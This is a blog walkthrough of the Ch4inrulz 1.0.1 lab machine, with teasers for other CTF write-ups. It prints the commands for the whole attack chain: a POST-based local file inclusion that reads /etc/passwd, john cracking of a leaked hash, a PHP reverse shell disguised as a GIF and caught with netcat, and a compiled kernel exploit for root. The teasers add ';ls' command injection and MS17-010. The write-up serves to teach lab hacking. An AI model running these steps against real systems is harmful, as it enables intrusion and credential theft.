Ch4inrulz: 1.0.1 Walkthrough

Lab Environment


Attacker’s Machine : Linux kali 4.18.0-kali2-amd64 #1 SMP Debian 4.18.10-2kali1 (2018-10-09) x86_64 GNU/Linux
Vulnerable Machine : Solid State: 1
Let’s start hacking and breach the security of this machine


Scanning Phase : Let’s start with knowing our attacking machine’s ip
        Syntax used : ifconfig
                Results : 192.168.146.131
Now let’s scan our local network to which attacking machine and vulnerable machine is connected.
      Syntax used : arp-scan --local
                  Victim machine : 192.168.146.135
Enumeration Phase : Now using nmap to scan the services running on ports .
    Syntax used : nmap -A 192.168.146.135 -p-  -Pn
     Results : http service is active on port 80,8011 ,ftp is active on port 21
and Ssh on port 22
Now browsing IP in desired browser to see the webpage on port 80


Now , fired up dirb to enumerate directories
Syntax used : dirb http://192.168.146.135


On browsing the links one by one i got something on 192.168.146.135/development
Note: Here is the hint of the upload functionality .
So changing the url from 192.168.146.135/development To 192.168.146.135/development/uploader
Results : I got the uploading functionality on the webpage.
On getting prompt for authentication , i just clicked on cancel .
This means I have to find credentials too .
Now , for further enumeration i shifted towards port 8011 and fired dirb to enumerate directories
Syntax used : dirb http://192.168.146.135:8011
Tried to browse the IP as http service is active on port 8011 and i got a webpage
I got one link from  dirb results : 192.168.146.135:8011/api/index.html
Results : Got directions to php files

So after opening files_api.php , a message was displayed in front of me which means that LFI can  be there so tried LFI and tried to passing the ‘file’ parameter as first line says


LFI syntax : 192.168.146.135:8011/api/files_api.php?file=/etc/passwd
Results : ‘WRONG INPUT !!’ Hint of using another technique


Here , using curl utility of kali linux to send request as POST request
Syntax used : curl -X POST -d “file=/etc/passwd” http://192.168.146.135:8011/api/files_api.php
No credentials  found yet and there was development server we found earlier so I again decided to run dirb and this time with different wordlist
Syntax used : dirb http://192.168.146.135  /usr/share/wordlists/dirb/big,txt
Results : Found index.html.bak file link


Browsing the link i.e  http://192.168.146.135/index.html.bak
Results : Downloadable file





Using cat command to view the content of the file
Syntax used : cat index.html.bak
Results : highlighted part is the passwd as written that it is the .htpasswd file


Copying the highlighted flag in text file named hash.txt and using john to crack it.
Syntax used : john hash.txt
Results: frank:frank!!!
Using the above credentials  to upload gif file into the uploader as uploader will only accept image file .
How i created payload with gif extension?
Command used : locate php-reverse
Results : I found php payload and modified it


Accessed it and copied the code in leafpad and changed the localhost to attacker’s IP and port as desired


Now added GIF98 in starting of the code so that it will act as gif and will not get detected


Now ,uploaded the payload successfully with username as frank and password as frank!!!
Now the main part is here i have to trigger that payload using POST request and have to fire up netcat
Command used : curl -X POST -d “file=/var/www/development/uploader/FRANKuploads/paras.gif” http://192.168.146.135:8011/api/files_api.php
Note: It took me long to guess the correct directory on which file is uploaded
Command used for netcat: nc -lnvp 1234(port number)
Results : got connection in netcat and spawned the shell
Command to spawn the shell: python -c ‘import pty; pty.spawn(“/bin/bash”)’
Now after getting the kernel version of victim machine
Command used : uname -a
Results : kernel 2.6.36
Found one exploit on exploit-db and downloaded that in attacker’s machine .
Transferred that exploit to victim after creating python server in attackers machine.
Command used : python -m SimpleHTTPserver 80
Transferred the exploit from attacker’s to victim machine in tmp directory of victim
Command used in victim machine to download the exploit from attacker’s machine :


Command to compile the exploit : gcc 15285.c -o 15285
Command used: chmod 777 15285
Explanation: to make file readable ,writeable and executeable .
Running exploit
Command used : ./15285
Results : root permissions


On exploring finally found the root flag


Popular posts from this blog

Calculat3 M3 | CTF Learn

Image
This walkthrough will demonstrate the simple challenge based on command injection Calculat3 M3 This is the challenge page we got after visiting the given link. I provided random input in this calculator and intercepted the request with BurpSuite I got one parameter "expression" taking the values  Tried for command injection with ";ls" Forwarding the above request finally Got the Flag
Read more

TryHackme: Blue Walkthrough

Image
Task 1: Recon After we've connected to the tryhackme network the first task is to enumerate the target. We use Nmap for scanning the target IP. Command Used : nmap -sS -Pn <target-ip> -sS : Scan using TCP SYN scan -Pn : Treats all host as online --skip host discovery Next we used a command to find the vulnerability on the target machine. Command Used : nmap --script vuln <target-ip> --script : Specify the --script option to choose your own scripts to execute by providing categories , script file names, or the name of directories full of scripts you wish to execute. vuln : These scripts check for known vulnerabilites and generally only report results if they are found. Below, we see that nmap is indicating the target may be vulnerable to ms17-010(on the left0 and we can verify this using metasploit. To start Metasploit use command "msfconsole" We start by simply doing a search for ms17-010 Here we use module 2 i.e. exploit/windows...
Read more

HackTheBox-Traceback Walkthrough

Image
I started with scanning the IP Addr with nmap using the simple command. Command Used: nmap IP Addr of machine -Pn  nmap 10.10.10.181 -Pn  Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-15 02:27 IST Nmap scan report for 10.10.10.181 Host is up (0.18s latency). Not shown: 998 closed ports PORT   STATE SERVICE 22/tcp open  ssh 80/tcp open  http Now only two things were in my mind and those were what should I enumerate first ssh or http. SSH can only be bruteforced and this point and bruteforce on the online machine doesn't works or we can say that most online hosted machines are not made to be bruteforced. So, I started  with HTTP. I fired up directory burster to find juicy directories if any and mean while I decided to browse the IP Addr since HTTP Service is active and running. I was presented with the below screen  dirb was not able to find any directories ...
Read more